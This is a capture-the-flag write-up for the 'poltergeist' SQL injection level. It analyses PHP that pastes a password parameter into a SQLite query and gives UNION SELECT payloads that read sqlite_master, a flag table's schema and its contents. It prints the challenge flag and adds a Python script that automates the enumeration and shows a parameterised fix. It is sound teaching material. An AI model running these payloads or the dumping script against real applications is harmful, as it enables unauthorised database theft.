
# \[Lord Of SQLInjection] poltergeist

<figure><img src="https://blog.kakaocdn.net/dna/KOZOT/btsNDsnSc7f/AAAAAAAAAAAAAAAAAAAAAMo-Rb1meHxcCF1FZkWoJZBOMxbiQyuGFl6jGEoSgi7M/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=2ske9L4PxNAvU2f1rI0ej06PmvU%3D" alt="" height="267" width="1124"><figcaption></figcaption></figure>

#### Code analysis

```
$query = "select id from member where id='admin' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = sqlite_fetch_array(sqlite_query($db,$query));
if($result['id']) echo "<h2>Hello {$result['id']}</h2>";
```

\- The query returns the `id` column of the `member` table for the row with id='admin' and pw='<attacker-controlled pw>'. `$_GET['pw']` is interpolated straight into the SQL string without escaping, so a single quote in `pw` closes the literal and everything after it is parsed as SQL.\
\- If the query returns a row, the page prints `Hello <id>`. Only the first row is ever displayed (`sqlite_fetch_array` is called once), which matters when an injected query returns several rows.

```
if($poltergeistFlag === $_GET['pw']) solve("poltergeist");
// Flag is in `flag_{$hash}` table, not in `member` table. Let's look over whole of the database.
```

\- `$poltergeistFlag` is stored in a separate table named `flag_{$hash}`, not in `member`, so it has to be read out of a table whose name is not known up front. The challenge is cleared only when that value is submitted as `pw` and passes the strict `===` comparison; the injection itself does not solve anything, it is only the read primitive used to find the value.

#### Solution

\- Use UNION SELECT through the injectable `pw` parameter to read `sqlite_master`, SQLite's schema catalogue. Each payload closes the `pw` literal with `'`, appends a UNION branch with one column (matching the single `id` column of the original SELECT), and comments out the trailing quote with `--`. Because the page shows only the first row, a UNION that returns several rows reveals only one of them; to walk through the rest, exclude names already seen with `tbl_name NOT IN (...)` or page with `LIMIT 1 OFFSET n`.

\- Step 1: list the tables. The result reveals a table named `flag_70c81d99`.

```
[URL]?pw=' UNION SELECT tbl_name FROM sqlite_master--
```

<figure><img src="https://blog.kakaocdn.net/dna/vRQJd/btsNC9B6qWv/AAAAAAAAAAAAAAAAAAAAAGaIJNH4rq4R_EahU0jJ_2Pa_S_O1uVs_1hr41Jm9ciJ/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=sqUp%2BGHFHoVWFWFy1bnV%2FgmEbsQ%3D" alt="" height="335" width="1123"><figcaption></figcaption></figure>

\- Step 2: read that table's definition. The `sql` column of `sqlite_master` holds the original `CREATE TABLE` statement, which reveals the column name `flag_0876285c`.

```
[URL]?pw=' UNION SELECT sql FROM sqlite_master WHERE tbl_name='flag_70c81d99'--
```

<figure><img src="https://blog.kakaocdn.net/dna/cYCgd2/btsNEMexv98/AAAAAAAAAAAAAAAAAAAAAAxVNJTtRWBplOrY2f_8fkTyDcrUj6r8i-0XUV2bUtk3/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=Lg6nEZ5psI5HKgolG1pnuMa9nhY%3D" alt="" height="341" width="1121"><figcaption></figcaption></figure>

\- Step 3: select that column from the flag table; the page prints the flag value after `Hello`.

```
[URL]?pw=' UNION SELECT flag_0876285c FROM flag_70c81d99--
```

<figure><img src="https://blog.kakaocdn.net/dna/Qv9Z2/btsNDP37BRk/AAAAAAAAAAAAAAAAAAAAACoMp9ZieEpe9byPcvIk9LnmEABPy1JVnLpiwkBVvFrp/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=6G084PTU0CSX4b0y264t%2F%2BN%2FpDU%3D" alt="" height="333" width="1119"><figcaption></figcaption></figure>

\- Step 4: submit the recovered value as `pw`. `$poltergeistFlag === $_GET['pw']` is now true and the challenge is cleared.

```
[URL]?pw=FLAG{ea5d3bbdcc4aec9abe4a6a9f66eaaa13}
```

<figure><img src="https://blog.kakaocdn.net/dna/lorZG/btsNCwqKqQ6/AAAAAAAAAAAAAAAAAAAAAJFC6MR2mSh9E3mAxq8o9SUPl4kg9wOGcVq05jDqUbJG/img.png?credential=yqXZFxpELC7KVnFOS48ylbz2pIh7yKj8&#x26;expires=1782831599&#x26;allow_ip=&#x26;allow_referer=&#x26;signature=YwdT1umfr%2BMH3x%2BOnQULfMnSGBQ%3D" alt="" height="405" width="1112"><figcaption></figcaption></figure>
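
The whole chain, as an added Python example that is not part of the original write-up. An in-memory SQLite database stands in for the challenge (Python's `sqlite3` module is SQLite 3, while PHP's legacy `sqlite_*` extension was built on SQLite 2; the `sqlite_master` catalogue works the same way for this purpose). The table and column names are the ones recovered above; the admin password, the extra `guest` row and the flag value are constructed for the example. `vulnerable_lookup` mirrors the PHP's string interpolation and one-row display, `enumerate_tables` generalises step 1 so every table is recovered even though only one row is visible per request, and `safe_lookup` shows the parameterised query against which the same payloads are just a wrong password.

```python
import sqlite3

# Constructed in-memory stand-in for the challenge database. The table and
# column names are the ones the write-up recovered; the row contents and the
# flag value are made up for this example.
SCHEMA = """
CREATE TABLE member (id TEXT, pw TEXT);
INSERT INTO member VALUES ('admin', 'constructed-admin-password');
INSERT INTO member VALUES ('guest', 'guest');
CREATE TABLE flag_70c81d99 (flag_0876285c TEXT);
INSERT INTO flag_70c81d99 VALUES ('FLAG{constructed_flag_for_this_example}');
"""


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def vulnerable_lookup(db, pw):
    """Mirror of the challenge's PHP: pw is pasted straight into the SQL text
    and only the first row (sqlite_fetch_array) is ever observed."""
    query = f"select id from member where id='admin' and pw='{pw}'"
    row = db.execute(query).fetchone()
    return row[0] if row else None


def safe_lookup(db, pw):
    """Hardened form: pw travels as a bound parameter, never as SQL text."""
    row = db.execute(
        "select id from member where id='admin' and pw=?", (pw,)
    ).fetchone()
    return row[0] if row else None


def enumerate_tables(db):
    """Step 1 of the write-up, generalised. Because only one row is displayed,
    exclude every name already seen until sqlite_master has nothing left."""
    found = []
    while True:
        exclude = ",".join(f"'{t}'" for t in found) or "''"
        pw = (f"' UNION SELECT tbl_name FROM sqlite_master "
              f"WHERE type='table' AND tbl_name NOT IN ({exclude})--")
        name = vulnerable_lookup(db, pw)
        if name is None:
            return found
        found.append(name)


def table_ddl(db, table):
    """Step 2: read the CREATE TABLE statement, which reveals column names."""
    pw = f"' UNION SELECT sql FROM sqlite_master WHERE tbl_name='{table}'--"
    return vulnerable_lookup(db, pw)


def column_names(ddl):
    """Parse 'CREATE TABLE t (a TEXT, b INTEGER)' into ['a', 'b']."""
    inner = ddl[ddl.index("(") + 1 : ddl.rindex(")")]
    return [col.strip().split()[0] for col in inner.split(",")]


def dump_flag(db):
    """Chain the three steps exactly as the write-up does, but driven by the
    recovered names instead of hard-coded ones (step 3 is the final payload)."""
    flag_table = next(t for t in enumerate_tables(db) if t.startswith("flag_"))
    col = column_names(table_ddl(db, flag_table))[0]
    return vulnerable_lookup(db, f"' UNION SELECT {col} FROM {flag_table}--")


if __name__ == "__main__":
    db = make_db()
    print("tables:", enumerate_tables(db))
    print("flag:", dump_flag(db))
    # The same payload against the parameterised query is just a wrong password.
    print("hardened:", safe_lookup(db, "' UNION SELECT tbl_name FROM sqlite_master--"))
```

The exclusion-list loop in `enumerate_tables` is deliberately order-independent: a compound `UNION` without `ORDER BY` has no guaranteed row order in SQLite, so relying on which table happens to come out first (as the screenshots in the write-up do) works for a one-off but not for a scripted dump.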